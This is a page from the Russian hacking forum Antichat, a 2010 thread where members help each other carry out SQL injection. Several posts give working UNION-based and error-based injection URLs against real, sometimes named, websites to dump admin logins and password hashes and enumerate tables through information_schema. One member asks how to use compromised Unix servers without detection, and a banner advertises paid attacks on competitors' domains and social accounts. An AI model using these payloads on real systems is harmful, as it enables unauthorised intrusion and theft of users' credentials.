Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1137 из 1393

1137

Опции темы

Поиск в этой теме

Опции просмотра

#11361

27.01.2010, 20:10

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

Цитата:

Сообщение от aka_google

Database Version: 5.0.32-Debian_7etch5-log

Проблемма такова делаю выборку :

_http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,log in,0x2d2d2d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+FROM+ users+LIMIT+1,1--
показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей .

кто что думает ?

зато вобла ловится

http://www.skr.su/?div=spec&id=-1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,hex(unhe x(password)),13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46+FROM+forum_user--

#11362

27.01.2010, 21:38

RedX

Познающий

Регистрация: 12.06.2008

Сообщений: 32

Провел на форуме:
324402

Репутация: 22

Отправить сообщение для RedX с помощью ICQ

Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.

#11363

27.01.2010, 22:30

Gidz

Познающий

Регистрация: 10.08.2009

Сообщений: 30

Провел на форуме:
282022

Репутация: 4

хелп, помогите победить

Код:

http://xxx/browse.php?cat=999999999'+union+select+1,2,3,4,5,6+--+

Последний раз редактировалось Gidz; 27.01.2010 в 22:55..

#11364

27.01.2010, 22:38

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333 ,concat_ws(0x2F,version(),database(),user()),555,6 66--+

В сурсе

Цитата:

<p align='center'>The directory you requested could not be found. If you believe this is a bug, please contact <a href='mailto:?subject=Dir Not Found: /files/5.0.51b-log/fusion/fusion@ginger'>sir</a>.</p>

Последний раз редактировалось ElteRUS; 27.01.2010 в 22:54..

#11365

27.01.2010, 22:58

v1d0qz

Познающий

Регистрация: 21.07.2007

Сообщений: 68

Провел на форуме:
947074

Репутация: 257

http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--++

ну или так, если ты не хочешь колупать сорцы. ps. кури ману.

Последний раз редактировалось v1d0qz; 27.01.2010 в 23:03..

#11366

28.01.2010, 12:15

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Отправить сообщение для kfor с помощью ICQ

Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.

#11367

28.01.2010, 12:35

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

2kfor
https://forum.antichat.ru/nextnewesttothread56632.html
http://forum.antichat.ru/thread45790.html

#11368

28.01.2010, 13:16

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?

#11369

28.01.2010, 13:49

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

Seravin:

http://www.site.com/news.php?id=-1+union+select+0,1,group_concat(table_name),2+from +information_schema.tables+where+schema_name='xxx'

#11370

28.01.2010, 13:52

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все
по базам -
select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'

Страница 1137 из 1393

1137

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход